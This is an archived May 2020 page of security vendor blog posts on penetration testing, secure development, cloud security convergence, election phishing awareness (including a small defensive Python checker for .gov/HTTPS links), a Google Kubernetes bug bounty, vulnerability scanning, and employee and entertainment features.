Monthly Archives: May 2020

Why Manual Penetration Testing and Automation are Important Aspects of an AppSec Program

Authored by Jacques Lopez and Tom Eston

As a result of the current COVID-19 pandemic, most companies are operating remotely. This “new normal” has led to an increased demand for digital transformations and cloud migrations. But Verizon’s 2020 Data Breach Investigations Report recently noted that cyberattackers are taking advantage of these digital transformations, finding new ways to attack web applications. As Tami Erwin, CEO of Verizon Business, recently stated, “As remote working surges in the face of the global pandemic, end-to-end security from the cloud to employee laptop becomes paramount.”

So how can you digitally transform your business while maintaining application security (AppSec)? You need to incorporate Manual Penetration Testing (MPT) along with AppSec automation. Leveraging only MPT can be costly and time-consuming, but if you only leverage automated scans, you could miss authorization issues and business logic flaws. Let’s explore MPT and AppSec automation in depth, and weigh the pros and cons, to show why both are essential to properly protect your applications.

Manual Penetration Testing

MPT is conducted by a human, known as a “pen tester.” The pen tester leverages security and assessment tools to uncover vulnerabilities in applications along with their resulting impact. MPT is vital for the deep inspection of critical apps because it finds classes of vulnerabilities that automated assessments can’t, such as authorization issues and business logic flaws. It also helps validate the results of an overall AppSec program. That said, it cannot be the only testing type used for your applications. It simply doesn’t integrate well enough to meet developers’ needs, and it’s not cost-effective.

Pros:

  • Leverages human understanding of business logic, finding vulnerabilities that automated assessments can’t identify
  • Offers in-depth testing into the application
  • Uses multiple tools to test the application
  • Provides an excellent snapshot in time of the security of the application
  • Is the generally accepted compliance step for a security review

Cons:

  • Does not always integrate well into the development process, although “crowdsourced” and “continuous” penetration testing models are arising to reduce response times
  • Can be a bottleneck in the process, slowing development down while developers wait for the results
  • Results can vary between tests and penetration testers – it is just human nature that testers will see different things and take different approaches
  • Occasionally leaves security gaps in between testing
  • Can be cost-prohibitive to test the full portfolio of applications

AppSec Automation

AppSec Automation is the programmatic incorporation of automated security scanning into the DevOps process and the security risk management practice. Security automation is required for scale, cost-effectiveness, and integration into the DevOps process. Organizations that solely rely on MPT have a minimal chance of reaching the programmatic outcomes around risk reduction that continuous scanning can provide.

Pros:

  • Can be integrated into the development process which is much easier for developers to use
  • Scales to encompass most, if not all, of the application portfolio
  • Implements a consistent and repeatable security policy
  • Benchmarks to show improvement over time
  • Scans on-demand at multiple stages of development and security review
  • Less expensive per scan

Cons:

  • Can only scan for what it knows. It does not currently replace understanding the business logic of an application and the creativity of a professional pen tester
  • May not be considered independent attestation if done with an on-premises tool

Both are required for a fully effective program but address different needs. MPT is best suited for a point-in-time assessment on business-critical applications where business logic considerations come into play. Automation builds a scalable AppSec program that benchmarks and demonstrates a reduction of risk over time. It also aligns with the development process, which is key to getting developers to adopt security practices.

If your organization is considering a digital transformation and looking to implement MPT or automated scans, we can help. Veracode and our channel partners can help you build out a program that meets your needs. Visit our product page to learn more.

The Power of Convergence

This blog was written by Rodman Ramezanian, Pre-Sales Security Engineer at McAfee

In cybersecurity, integration has become a near-obligatory requirement for organisations considering new products. They want to know new products will complement existing investments to collectively produce more effective and efficient solutions.

But as of late, the term convergence has emerged as another key capability and expectation of technology platforms.

I’d like to explore how these terms differ and how those differences will shape security outcomes in the future.

Definitions

Let’s start with a stone-cold definition. According to the Merriam-Webster Dictionary:

  • Integrate means “to end the segregation of and bring into equal membership in society or an organisation”
  • Converge means “to come together and unite in a common interest or focus”

Are we splitting hairs here? Are they much of a muchness?

These days, integration typically refers to the establishment of a common communication channel or route between disparate solutions to solve a particular challenge – usually to enable data sharing of some sort. Standard examples we hear sound like, “we’ve integrated this tool with that platform via API/Syslog/PowerShell” or various other methods.

Convergence approaches things differently by consolidating features and capabilities onto a common scalable architecture and platform. To take a common example from daily life (nowadays, anyway), converged networks such as Cisco WebEx, Zoom, and Microsoft Teams to name just a few, amalgamate voice, video, and data services within a unified infrastructure.

Convergence aims to deliver the following benefits:

  • Lower costs and complexity – consolidating vendors and technology stacks should reduce licensing and operational costs, as well as management overhead
  • Enabling new digital business scenarios – apps, services, APIs, and data shareable with partners and contractors with lower risk exposure
  • Ease of use/transparency – avoiding app bloat, fewer agents per device, consistency of experience regardless of user location or device
  • Centralisation – cloud-based centralised management with distributed policy enforcement and decision making

While these benefits may not come as a surprise to some, many could argue that integration could very well yield the same outcomes and thus, the differences are negligible. Let’s take a moment to walk through a real-world example to show the contrast between the two.

Challenges and Benefits

It may be helpful to elaborate with examples to highlight just some challenges typically faced with integrations.

Let’s consider an organisation that wants to improve its security attentiveness and overall posture by blocking access to websites and Cloud services based on business risk, not just standard reputational checks. In this given scenario, let’s assume the organisation has mandated that its lines of business must ensure Cloud services being used must store their data encrypted when at rest.

In order to achieve this from a workflow perspective, they would need to integrate the business risk attributes for a given website (such as whether or not data at rest is encrypted) from a Cloud Access Security Broker (CASB) solution, along with the content filtering and blocking capabilities from a Secure Web Gateway (SWG) solution. Usually, this would be done via custom API integration; assuming that no further re-architecture work or implementation of data sharing platforms is needed.


Considering this, ask yourself what happens if/when:

  • The API is changed during an upgrade?
  • The SWG appliance requires a patch or version upgrade?
  • The personnel who wrote or implemented the integration leave the organisation?
  • Credentials and/or certificates used to authenticate between the solutions need to be refreshed?
  • The connection between the solutions breaks down? Is the customer ultimately responsible for restitching the products together, or are the respective vendors then called into action?

Now, let’s reflect on the benefits we mentioned earlier. Complexity goes out the window the moment we begin to mention bespoke integration via coding and credential/certificate management. Version control for the code, along with the dependence on version specific APIs, draw out more complexity as change management for each iteration of the configuration needs to be tested. In addition, we need to consider the additional complexity brought by the need to open up firewall ports between the various components involved to make this integration work.

Centralised management and enforcement don’t exist as the two solutions and their ontologies don’t align. That is, a risk attribute for a Cloud service in the CASB product cannot be natively stored in the SWG as its ontology lacks this concept. This means that they must resort to a common lower value ontology which is common across the two – in this case, the URL. The resultant integration means a dumbed-down list of URLs must be used. This list would be routinely and regularly pushed from the CASB to a list within the SWG. At that point, its accuracy and timeliness become highly dependent on the synchronisation and polling period between the two products.

With this, ease of use diminishes as attrition in personnel brings about lost institutional knowledge and know-how unless that knowledge is transferred or sufficiently documented. Also, in the event of an incorrect block on a website, troubleshooting would become difficult.


We could simplify this integration and remove some of the barriers mentioned above were we to use a Cloud-delivered SWG – however challenges such as different ontology, API management, credential management and integration testing remain unchanged.

So then, how does one go from integration to convergence? The answer is simple – acceptance of the need to change the approach and a willingness to get it done.

In order to adequately address the use case at hand, the technologies involved need to come together to ultimately become one. While this seems like something that could be blurred in a Cloud-delivered offering through converging parts of the UI with microservices from both products, doing so would technically fall into the integration bucket as ontologies and UI/UX remain different and would lack simplification. So, what would it take to converge CASB and SWG solutions?

  • Merging ontology – Bringing both CASB and SWG elements together. An example of this may be, using the same Cloud “Service Group” object in both solutions
  • Leveraging common capabilities – It doesn’t just stop with ontology. The solutions need to merge other components such as incident management, logging, dashboards, policy definitions, user authentication, etc. This convergence would not only improve the end user experience, but also reduce future technical debt in maintaining overlapping capabilities and components
  • Refactoring UI/UX – Rethinking and re-working the user experience to bring about the simplest flow to achieve the converged use cases

In the figure below, we have a policy example that creates a grouping of all high-risk Cloud services, current and future, that can be used as a restriction for web access. The result is that any high-risk Cloud service will be blocked by the Cloud-native SWG, preventing users from accessing these services to keep them safe from accidental data loss and/or malware. All this with no bespoke integration, no polling or pulling, no scripts, no firewall rules, no credential or certificate management and most importantly, no complexity!

[Figure: policy example grouping all high-risk Cloud services, current and future, as a web access restriction]

Now, this is just but one example of convergence as part of McAfee’s Unified Cloud Edge (UCE) solution. Further convergence is necessary to refactor many of the data protection workflows traditionally kept separate from other enterprise security platforms.

According to an industry survey conducted by McAfee, only 31% of companies said their Cloud security tools could enforce the same DLP policies at their Devices, Network, and Cloud Services.

As part of McAfee’s Unified Cloud Edge solution, the convergence of Data Loss Prevention (DLP) policies and attributes with SWG and CASB technologies will ultimately lead to the unification of data classifications, rules, incidents, workflows, and so much more across Devices, Networks, and Cloud environments.

Final thoughts

Blended threats require a blended security response. Converging security practices and capabilities creates a whole that’s greater than the sum of its parts. Even something as simple as unifying an organisation’s security visibility – spanning from Device to Cloud – through a converged and centralised portal yields powerful gains in specific incidents and over the long run.

Converging security processes should align your security operations with your business goals and amplify your organisation’s performance of its most important functions. A converged security program protects your organisation’s key assets and helps get them back up and running faster when something does go wrong. Ultimately, converged security practices can be part of your organisation’s competitive advantage.

If you’d like to discuss any of the points covered here, or more specifically McAfee’s converged security solutions in further detail, please feel free to reach out to me.

* Special thanks to my manager Sahba Idelkhani for his guidance and input into this blog *

The post The Power of Convergence appeared first on McAfee Blogs.

Leaning into Change with the McAfee Family

With today’s current climate, many companies are building cultures and infrastructures to support working from home (WFH). Like most transitions, this brings equal parts expectation and surprise.

For some, working from home means having more quality time with family or finally being able to take that 10 a.m. yoga class. It means experimenting with homeschooling schedules and more puppy time. Learning how to use funny webcam filters and backgrounds has never seemed more important.

Read Our Stories

At McAfee, we are no exception to this evolution. We have virtual employees around the world, including team members who have recently transitioned to remote work. See how some of our McAfee family is adapting to this environment:

“It’s just my wife and me and our two cats, so we’ve been fortunate that our primary inconvenience has been trying to keep the kitties from pouncing on our warm laptops.” Dennis, Product Marketing

“Although walks are slightly different with trying to maintain the 6 ft distance with strangers, it’s nice to see more of the neighborhood going out for walks with their family and pets. I’ve never seen so many people walking around before!” Sarah, Business Operations

“Thankfully, we set up our home office a few years ago, and it’s been very comfortable to work from for me. The hardest part is not having social interactions, but I’m trying to make conscious efforts to reach out to people.” Aki, Product Design

“I’m grateful for all the added family time that we have now! Also, the house has probably not been this clean in YEARS.” Tiffany, Product Marketing

“I was very used to going to the office so working from home has been a change. However, I get to see my family much more often than before.” Pablo, Product Management

“I was fortunate enough to work remotely before it was required, but my coworker here helps give structure to my days with morning, lunch, and evening walks, almost bookending my workday!” Jonathan, Product Marketing

“Transitioning to working from home full-time has taught me the need to establish a routine and stick to it. I make sure I’m exercising, setting work hours and taking breaks. The first couple of weeks without that routine in place was tough, but now I feel more balanced and not drained. Another good tip: Always keep healthy snacks and water at your work station!” Lily, Program Manager

“Working from home is turning out to be great! I have the perfect work station with a standing desk to stay productive. I love having my five-year-old daughter, Stella, visit me in my makeshift office between her online school sessions and seeing my wife and daughter more than ever before!” Martin, Product Management

“Transitioning to working remotely has been a bit rocky, but the 10-step commute and daily lunch with my wife makes it much less painful. My two dogs have been the real winners!” Alex, User Research

“I had minor shoulder surgery right before the quarantine and couldn’t carry a monitor from the office, so I made it work with an old TV on my kitchen counter! I can sit AND stand at my new desk, and the proximity to snacks and fresh coffee is a nice perk.” Iram, Marketing Operations

“My three active kids were rarely in the house prior to this event. Now dinner together is a regular thing, and everyone is enjoying it. I’m thinking games and puzzles might be a way to avoid it devolving into a Lord of the Flies scenario.” Tracy, Product Management

“The work/home balance is a constant effort of refinement. Though it has been somewhat rocky at times, I’ve found my stride and am now getting to spend more time with my family in the morning and at night.” Jon, Visual Design

“I’m so glad I took some time to set up a dedicated workspace – it made a huge difference. The cat’s still on my lap, and I’m still in the living room, but I’m off the couch and in a real chair, and have places to put my stuff, so I don’t have to hunt around every morning.” Paula, Executive Communications


Are you looking for a flexible career opportunity in a thriving culture? Search our openings.

The post Leaning into Change with the McAfee Family appeared first on McAfee Blogs.

Secure Development Without Sacrificing Innovation and Speed

If you know the term “nightly build,” chances are you’ve been a part of that process before. A nightly build – code compiled overnight from previously checked-in code – is a foundational way to find flaws or issues that arise from changes made during long build processes. But while a staple in DevOps, nightly builds also present a problem: if new bugs are discovered the morning after the build, everything slows down. Additionally, such activity only heightens the wall between development and security by compartmentalizing the tasks developers and security professionals must undertake every day (or night).

The history of the divide between security and development doesn’t fall solely on nightly builds, of course. It comes from a place of misconception, where developers fear that security leaders are ready to stall production at every turn, and security leaders lack the knowledge to fully understand the lingo, processes, or goals of developers. Historically, both teams have worked away in their own siloed departments with little to no direction from leadership on ways to come together.

Unifying security and development

By bridging the lines of communication, both teams can start to have serious conversations about producing more secure code without sacrificing the speed needed to meet tight deadlines. At the core of the issue is education. Both development and security teams need to find a common ground for working together and take it a step further to understand exactly how the other side of the aisle works – and how they can plug in their own processes to make that work more effective.

On the developer side of the aisle, that comes down to appreciating the value of security and sharpening the skills they need to write code with fewer flaws and bugs. On the security side, it means understanding developer timelines, tools, and processes, then working with leadership to figure out how to integrate security tools into their existing methods for time-saving automation and valuable coding feedback.

According to a recent report by Securosis, this should be a top-down effort involving members from all the necessary teams. “With DevOps you need to close the loop on issues within infrastructure, security testing as well as code. And Dev and Ops offer different possible solutions to most vulnerabilities, so the people managing security need to include operations teams as well.”

Once members of these teams come together with open dialogue about current issues and business goals, they’re on the right path to begin discussing which processes and tools will improve the health of their application security without impacting deployment speed.

Know where to start when fixing flaws

Security debt is a real problem that adds up over time and should be addressed with a plan of action to bring it down and reduce risk. But not every vulnerability is mission-critical, whether it sits in a pile of security debt or it was discovered in a batch of new flaws during a recent scan.

According to the Securosis report, deciding which vulnerabilities to tackle first is a common issue for development teams. “During our research many security pros told us that all vulnerabilities started looking like high priorities, and it was incredibly difficult to differentiate a vulnerability with impact on the organization from one which did not,” the report says.

Prioritization can speed up the entire development process as little time is wasted going back and forth. While helping to set priorities for developers, security leaders have an opportunity to help developers understand which flaws need to be addressed immediately during development, and which possible threats tie back to unattended vulnerabilities so that developers have a better understanding of how to prioritize flaws in the future.

Automation through integration

Automation brings rapidity and, if used long enough, consistency. With modern software development speeding up and not slowing down, it’s more important than ever that developers have the right scanning tools to plug directly into their existing processes with seamless integration. And while automated feedback and security testing alone won’t catch every flaw, error, or vulnerability, it sets a precedent for incorporating security into the development process, and a baseline for healthy code as the team moves through development.

Complete application security plans incorporate scanning and testing into every stage of the development process, from the IDE to the Pipeline and even review, staging, and production. Veracode Static Analysis has this covered, with automated security feedback in the IDE and Pipeline that alerts (and trains) developers while they work. Veracode Static Analysis conducts a full policy scan before deployment too, showing the vulnerabilities that developers should focus on, and leaving an audit trail for review.

With a tool like Veracode Static Analysis integrated into existing systems and processes, security and development teams will gain clear insight into not only which flaws to prioritize, but also areas where developers need more training and education so that they can produce more secure code in the future. This automated (and peer) feedback helps set a standard for consistency, and improves speed overall – those nightly builds can then turn into builds with continuous integration that facilitates faster fix rates.

eLearning tools for continuous education

Continuous education is something that both security and development should embrace if they want to help close the information and communication gaps between the two teams. Security leaders for their part should brush up on developer lingo, tools, and languages – especially when a new language is introduced into the development process.

For developers, boosting skills through hands-on courses, virtual workshops, and instructor-led training increases the speed at which developers work and the security of their applications. By bringing continuous education into the mix so that secure code is front of mind, security and development teams will have an easier time shifting security left with each new project. Eventually, it’ll become a regular part of the process to learn from past mistakes, grow to become more innovative and adapt to new security threats.

Tools like Veracode Security Labs take training to the next level by providing developers with real-world examples of threats that they can exploit and patch for practice. This hands-on-keyboard training is unlike cookie-cutter courses, as it is interactive and focuses on real applications with real vulnerabilities.

Security Labs helps meet training and compliance needs, too, with customized education in the languages an organization’s developers use most. That tailored experience becomes invaluable when every hour of the day is dedicated to improving the security of your applications. Developers start learning right away and plug back in when they’re ready for more; it’s a small step that has a big impact.

For more information on speeding up the development process through integration, automation, and feedback, read our eBook on how you can secure your software development pipeline with Veracode Static Analysis.

2020 Voters: What You Need to Know About Election Security

Voters across the country are preparing to cast their ballot for the all-important 2020 U.S. presidential elections. Whether you’re a new voter eager for your voice to be heard or a parent looking to guide your family members on exercising their right to vote, consumers can be certain about one thing: election security should be top-of-mind for everyone as Election Day creeps closer. In addition to researching the presidential candidates and deciding who to support, consumers should also educate themselves on how to vote safely and securely.    

Heads Up, First-Time Voters

As a young or first-time voter, you are probably eager to have your voice finally heard. However, you should also be on high alert for digital disinformation campaigns. These scams seek to suppress or disrupt the voting process by setting up bogus websites with official-sounding domains and related email addresses. From there, hackers could use those bogus email addresses to send mass email blasts intended to feed unsuspecting voter email recipients false information on when, where, and how to vote.   

According to recent McAfee survey results, the majority of election administration websites for “tossup” states lacked the official U.S. government .GOV website validation and HTTPS website security measures, which prevent hackers from launching fake websites disguised as legitimate county government sites. It is critical that before Americans cast that incredibly important ballot, they confirm the site they are visiting is a .GOV website and that HTTPS security protection is in place.  

Help Protect Your Family’s Vote

Whether it’s who you’re voting for or what you think of party policy, it’s incredibly important that every voice is heard in 2020. As people across the country make their decision, you must discuss the implications of digital disinformation and illegitimate voting websites with your family. Failing to discuss these attacks with new or young voters could mean the difference between whether or not their voice is heard in the 2020 election. Consumers must take action to ensure they are staying informed on possible hacks like this and sharing it with their loved ones to ensure no voices are left unheard this year.  

Whether it’s your first or fifteenth time heading to the polls, we must all take action to ensure we’re staying informed on possible hacks, minimizing risk and not leaving this vote to chance. As you or your loved ones prepare to cast your ballots, consider these tips to help ensure that your vote is protected:   

Look out for suspicious emails

Carefully scrutinize all election-related emails. An attacker seeking to misinform consumers can use phishing techniques to accomplish their objective. Beware of election emails from non-.gov addresses such as .com, .net, .org, or .us, particularly any emails sent in the final days before Election Day. 

Question conflicting instructions

Question any voting instructions that appear to conflict with other guidance you’ve received from traditional sources such as the U.S. Postal Service, the primary channel state and local governments use to send out voting information.  

Refer to your official State website

When in doubt, visit your state’s elections website to receive general election information on voter registration and contact information for your county’s election officials. Contact the local county officials to confirm any election instructions you receive via email, social media, or websites leading up to Election Day. Voters can find the official state election websites here.

Confirm local instructions locally

Call your county or city government officials directly to confirm any last-minute voting instruction changes to the regional or local Election Day procedures. 

Ask for .gov and https on websites

Ask your county officials to use .gov validation and https protection on any government websites involved in elections. The .gov in a website name validates that the U.S. government has certified that the website truly belongs to the government entity it claims. The https indicates that any information you share with the government website cannot be stolen and that voters cannot be redirected to fake government sites.
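To make the last two tips concrete, here is an added example (not code from McAfee’s post) that checks whether a link is HTTPS and really sits under a .gov domain, and whether an election e-mail comes from a .gov sender; it deliberately rejects lookalike hosts such as vote.gov.example.com or a URL with a decoy user@ part, which a naive “.gov” substring check would accept. Every hostname and address in it is constructed for illustration.

```python
"""Checks for the two tips above: is an election-related link HTTPS and really
under a .gov domain, and does an election e-mail come from a .gov sender?

Added example for this post, not McAfee's own code. Every hostname and address
below is constructed for illustration.
"""
from urllib.parse import urlsplit


def is_gov_host(hostname):
    """Return True only when the hostname's final label is exactly 'gov'.

    A substring test such as '.gov' in url is fooled by lookalike hosts like
    'vote.gov.example.com' or 'county-gov.com'. Checking the last label of the
    parsed hostname is not.
    """
    if not hostname:
        return False
    labels = hostname.lower().rstrip(".").split(".")
    # Require at least "<name>.gov" with no empty labels; 'gov' alone fails.
    return len(labels) >= 2 and labels[-1] == "gov" and all(labels)


def check_election_link(url):
    """Apply both website checks from the post: .gov domain and HTTPS scheme."""
    parts = urlsplit(url.strip())
    # urlsplit discards any user@ part, so 'https://county.gov@evil.example/'
    # yields the real host 'evil.example' rather than the decoy 'county.gov'.
    host = parts.hostname or ""
    is_gov = is_gov_host(host)
    is_https = parts.scheme == "https"  # urlsplit lowercases the scheme
    return {"host": host, "is_gov": is_gov, "is_https": is_https,
            "ok": is_gov and is_https}


def check_sender_address(address):
    """Flag election e-mail from non-.gov senders (.com, .net, .org, .us, ...)."""
    local, at, domain = address.strip().rpartition("@")
    is_gov = bool(local) and bool(at) and is_gov_host(domain)
    return {"domain": domain.lower(), "is_gov": is_gov}


def triage(links, senders):
    """Return the links and sender addresses that fail the checks."""
    bad_links = [u for u in links if not check_election_link(u)["ok"]]
    bad_senders = [a for a in senders if not check_sender_address(a)["is_gov"]]
    return bad_links, bad_senders


# Constructed sample input: what a voter might see in an inbox in the final
# days before Election Day (none of these are real sites or addresses).
SAMPLE_LINKS = [
    "https://elections.example.gov/where-to-vote",    # .gov and HTTPS: OK
    "http://elections.example.gov/where-to-vote",     # .gov but plain HTTP
    "https://vote.gov.example.com/where-to-vote",     # lookalike, ends in .com
    "https://county.gov@evil.example/where-to-vote",  # decoy in the user@ part
    "https://county-gov.com/where-to-vote",           # hyphenated lookalike
]
SAMPLE_SENDERS = [
    "clerk@county.example.gov",          # .gov sender
    "elections@vote-info.example.com",   # non-.gov sender
    "noreply@county.gov.example.org",    # .gov buried inside a .org domain
]

if __name__ == "__main__":
    bad_links, bad_senders = triage(SAMPLE_LINKS, SAMPLE_SENDERS)
    for u in bad_links:
        print("suspicious link:  ", u, check_election_link(u))
    for a in bad_senders:
        print("suspicious sender:", a, check_sender_address(a))
```

The check only looks at the hostname and scheme; it does not replace confirming instructions with your county officials, as the tips above advise.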

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 2020 Voters: What You Need to Know About Election Security appeared first on McAfee Blogs.

How I Use McAfee’s Volunteer Time Off to Help Lost Paws Find Homes

by Christine, Sales Operations, Plano

Imagine sixteen paws, eight floppy ears and four wagging tails happily greeting you at the door—that’s my welcoming committee every day. Dogs have always held a special place in my heart, but it wasn’t until I added the third to my pack that I felt dogs were my passion.

I averaged 100 volunteer hours a year for an animal rescue, but with the Volunteer Time Off benefit at McAfee, I can add another 32 hours to that, which allows me even more time to support rehoming approximately 650 animals per year. 

Answering the Howl

Six years ago, my calling found me when I adopted my third from Lost Paws Rescue of Texas. During my conversations with the founder and volunteers, I learned Lost Paws operated with little to no funding and they supported animals on the side of their full-time jobs! There was no shelter or storefront – it’s a foster-only rescue, which means donations directly support the animals and programs.

Impressed and inspired, something just clicked. With my hobby marketer skills and passion for animals, I could help. 

Learning New Tricks 

My top talent is ideation, and since my household is nearly at capacity with canine companions, I come up with other ways to volunteer. It’s my creative outlet. I take pictures of the animals, work adoption events, add story updates to the website and learned how to help with SEO as well as make crate pads and bandanas for the animals. 

Helping animals find a loving home is rewarding but carving out time to make an impact is challenging. That’s why I’m so appreciative to work for a company that offers time off to volunteer. With four days off per year to volunteer, I know I’m supported in giving back to a cause that is important to me.   

Most recently, I’ve used McAfee’s Volunteer Time Off benefit to expand my skill set with grant writing classes. With stronger writing skills, I could better support funding requests for Lost Paws.  

Making an Impact with McAfee 

Giving back in these different ways is rewarding. I’ve helped grow Lost Paws Rescue’s participation in community giving initiatives. Through our SEO efforts, when DFW rescues are Googled, Lost Paws Rescue of Texas appears on the front page (alongside some of the larger, global animal rescues!). I’m also proud to share that grant writing classes were helpful as we were awarded $26K for a couple of my successful submissions just last fall. 

McAfee’s Volunteer Time Off (VTO) benefit is simply awesome. We are so lucky to have volunteer days as employees. I’m constantly trying to figure out a new way to serve this cause. It’s been a labor of love—for me, for the animals and for this organization and it’s empowering to know McAfee supports me along the way. 

Here, I can bring all my passions, interests and talents through the door. 

Interested in working for a company that supports giving back? Search our openings. 

The post How I Use McAfee’s Volunteer Time Off to Help Lost Paws Find Homes appeared first on McAfee Blogs.

Expanding our work with the open source security community

At Google, we’ve always believed in the benefits and importance of using open source technologies to innovate. We enjoy being a part of the community and we want to give back in new ways. As part of this effort, we are excited to announce an expansion of our Google Vulnerability Rewards Program (VRP) to cover all the critical open-source dependencies of Google Kubernetes Engine (GKE). We have designed this expansion with the goal of incentivizing the security community to work even more closely with open source projects, supporting the maintainers whose work we all rely on.

The CNCF, in partnership with Google, recently announced a bug bounty program for Kubernetes that pays up to $10,000 for vulnerabilities discovered within the project. And today, in addition to that, we are expanding the scope of the Google VRP program to also include privilege escalation bugs in a hardened GKE lab cluster we've set up for this purpose. This will cover exploitable vulnerabilities in all dependencies that can lead to a node compromise, such as privilege escalation bugs in the Linux kernel, as well as in the underlying hardware or other components of our infrastructure that could allow for privilege escalation inside a GKE cluster.

How it works
We have set up a lab environment on GKE based on an open-source Kubernetes-based Capture-the-Flag (CTF) project called kCTF. Participants will be required to:
  • Break out of a containerized environment running on a Kubernetes pod and,
  • Read one of two secret flags: One flag is on the same pod, and the other one is in another Kubernetes pod in a different namespace.
Flags will be changed often, and participants need to submit the secret flag as proof of successful exploitation. The lab environment does not store any data (such as the commands or files used to exploit it), so participants need the flags to demonstrate they were able to compromise it.

The rewards will work in the following way:
  • Bugs that affect the lab GKE environment that can lead to stealing both flags will be rewarded up to 10,000 USD, but we will review each report on a case-by-case basis. Any vulnerabilities are in scope, regardless of where they are: Linux, Kubernetes, kCTF, Google, or any other dependency. Instructions on how to submit the flags and exploits are available here.
  • Bugs that are 100% in Google code qualify for an additional Google VRP reward.
  • Bugs that are 100% in Kubernetes code qualify for an additional CNCF Kubernetes reward.
Any vulnerabilities found outside of GKE (like Kubernetes or the Linux kernel) should be reported to the corresponding upstream project security teams. To make this program expansion as efficient as possible for the maintainers, we will only reward vulnerabilities shown to be exploitable by stealing a flag. If your exploit relies on something in upstream Kubernetes, the Linux Kernel, or any other dependency, you need to report it there first, get it resolved, and then report it to Google. See instructions here.

The GKE lab environment is built on top of a CTF infrastructure that we just open-sourced on GitHub. The infrastructure is new, and we are looking forward to receiving feedback from the community before it can be actively used in CTF competitions. By including the CTF infrastructure in the scope of the Google VRP, we want to incentivise the community to help us secure not just the CTF competitions that will use it, but also GKE and the broader Kubernetes ecosystems.

In March 2020, we announced the winner for the first Google Cloud Platform (GCP) VRP Prize and since then we have seen increased interest and research happening on Google Cloud. With this new initiative, we hope to bring even more awareness to Google Cloud by experienced security researchers, so we can all work together to secure our shared open-source foundations.

The pros and cons of vulnerability scanning

Scanning your networks and software for security vulnerabilities is essential for keeping your organisation secure, but it’s not a perfect solution.

It will help you identify weaknesses in your system – with new ones being discovered all the time or introduced as a result of system changes – but it only works when combined with other practices and when you have a solid understanding of the information security landscape.

Let’s take a deeper look into the advantages and disadvantages of vulnerability scanning.

Advantages

Identify vulnerabilities before cyber criminals do

Many cyber attacks are automated, and involve criminals searching for and exploiting known vulnerabilities.

In other words, they’re not creating a vulnerability or finding an obscure weakness through their expert hacking skills. They’re simply looking for vulnerabilities in the same way as anyone with the right scanning software could.

So when organisations use the same tools, they are able to discover weaknesses and fix them before anyone has a chance to exploit them.

Define the level of risk on your systems

Conducting regular vulnerability scans will help you determine the overall effectiveness of your security measures.

If you’re inundated with vulnerabilities, that’s a sign that your systems or software are severely flawed and need to be rethought.

Save time and money

Automated scans are easy to repeat and will save you money in the long term.

That’s because vulnerability scanning mitigates the risks of a data breach, which will come with a range of costs, including remediation, the loss of customers as a result of reputational damage and fines.

Likewise, if you have cyber insurance, you will need to conduct regular vulnerability scans to prove that you were addressing your cyber security responsibilities and to receive your pay-out.

Meet data protection requirements

Vulnerability scanning is not explicitly required by the GDPR (General Data Protection Regulation), but the Regulation does require organisations that process personal data to ensure that they have implemented appropriate technical and organisational security measures – which includes identifying vulnerabilities.

The international standard for information security, ISO 27001, also requires organisations to take similar steps, and the PCI DSS (Payment Card Industry Data Security Standard) includes vulnerability scanning in its list of requirements.

Disadvantages

You won’t find every vulnerability

Vulnerability scans aren’t perfect. Like antivirus software, they rely on a database of known weaknesses and are only as good as the latest update.

Conducting scans using outdated or inferior tools therefore means you are liable to miss vulnerabilities and get a false sense of security.

Even with the latest technology, there will almost certainly be weaknesses that the scanner won’t pick up. This might be because it’s newly discovered or because the vulnerability is too complex to be exploited – and thus detected – by an automated tool.

False positives

It’s not always easy to work out what the results of a vulnerability scan mean. For example, the tool might mistakenly flag something that looks suspicious as a vulnerability when it isn’t.

As such, without someone with the expertise to interpret the results, it will take a lot longer to determine the true nature of your security posture. Likewise, if you’re unable to filter out false positives, the tool will continue to generate inaccurate results.

Make the most of vulnerability scanning

Although vulnerability scanning is never a perfect solution, it’s an essential process – and there are ways of maximising the benefits while minimising the drawbacks.

For example, our Vulnerability Scan service combines the benefits of an automated tool with the expertise of a security professional.

The tool will scan for thousands of weaknesses each month, and you’ll receive a detailed vulnerability assessment that gives you a breakdown of the weak spots that you must address.

Identify vulnerabilities and misconfigurations in your websites with our vulnerability scanning service

The post The pros and cons of vulnerability scanning appeared first on IT Governance UK Blog.

Entertainment #FromHome: What to do When You’re Bored at Home

If your queue of movies and shows is looking a little on the “I’ve already watched that one twice already” side, this one’s for you. I’ve put together a raft of fresh shows, movies, and performances based upon my online travels and on suggestions from a few friends. And oh yes, everything on here is for free—from reputable sources and sites—free movies, free shows, free plays, free audio books, and more. Let’s dig in!

Catch a movie at a free global film festival

An entire host of major film festivals have banded together to create a virtual film festival—the We Are One Global Film Festival, which kicks off on May 29th and runs through June 7th. Now this looks really special. It brings together some 20 festivals, including Cannes, Sundance, Toronto International, Berlin International, Tribeca, Venice, and more, so you can only imagine what types of cinema you’ll find. It’s all free and looks to include festival fare ranging from films and shorts to documentaries, music, and comedies, all of which you can watch on YouTube. As I’m writing this, the list of films has yet to be published, but you can bet on seeing some films you simply won’t see anywhere else right now.

London’s National Theatre at home

For some time, London’s National Theatre has recorded numerous performances through its National Theatre Live program, which it has broadcast to hundreds of venues worldwide. Now, with its temporary closure, the National Theatre is premiering a new performance every Thursday. Each one is free and available for one week, with performances from actors such as James Corden, Benedict Cumberbatch, Tom Hiddleston, and Gillian Anderson in anything from American classics like A Streetcar Named Desire to Shakespeare, Greek theatre, and adaptations of novels like Frankenstein and Treasure Island.

Free movies, eBooks, and audio books

I referenced Open Culture a few weeks ago in one of my earlier articles on personal development from home, and they’re back again this week. This time, it’s Open Culture’s free audio book library with 1,000 titles to choose from. You’ll find a mix of fiction and non-fiction with readings of Twain, Hemingway, Vonnegut, Austen, Asimov, Conan Doyle, Dostoyevsky, and … well, clearly, I could go on. You get the idea, though. An additional list of theirs compiles 800 free eBooks for your reading pleasure with a similar blend of fiction, non-fiction, and poetry too.

And yes, Open Culture has free movies as well. It’s quite the curated list with more than 1,100 free films that range from indies to westerns and Hitchcock to John Wayne and old martial arts flicks and film noir. That’s in addition to all of the other content they gather from across the internet and make available to us, with other sections dedicated to free language lessons, free business courses, and more. Put it this way: if you’re ever on the hunt for something fresh to read, watch, or do, Open Culture is a great site.

Free eBooks and audio books from Libby

